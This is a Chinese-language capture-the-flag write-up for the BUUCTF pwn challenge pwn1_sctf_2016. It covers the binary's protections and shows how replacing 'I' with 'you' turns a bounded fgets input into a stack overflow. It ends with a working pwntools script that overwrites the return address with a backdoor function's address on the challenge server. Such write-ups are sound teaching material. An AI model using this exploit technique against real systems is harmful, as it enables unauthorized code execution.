BUUCTF-PWN-pwn1_sctf_2016
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
32位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----可能存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接
ida一下看一下伪代码
主函数调用一个vuln()函数
和平常不一样,这次是c++代码
首先让我们输入一个字符串,发现函数fgets,但是该函数只读取0x20个字节,而s有0x3c字节大小,
之后看这三行代码,会把我们输入的字符串中的I变成you,
我们可以输入0x14字节(0x3c / 3),然后在strcpy处将v1付给s,实现栈溢出
之后又在ida里发现了后门函数
查看地址
cat_flag = 0x8048F0D
exp
from pwn import *
p = remote("node4.buuoj.cn",29180)
cat_flag = 0x8048F0D
p.sendline(b'I' * 0x14 + b'b' * 4 + p32(cat_flag))
p.interactive()
运行获得flag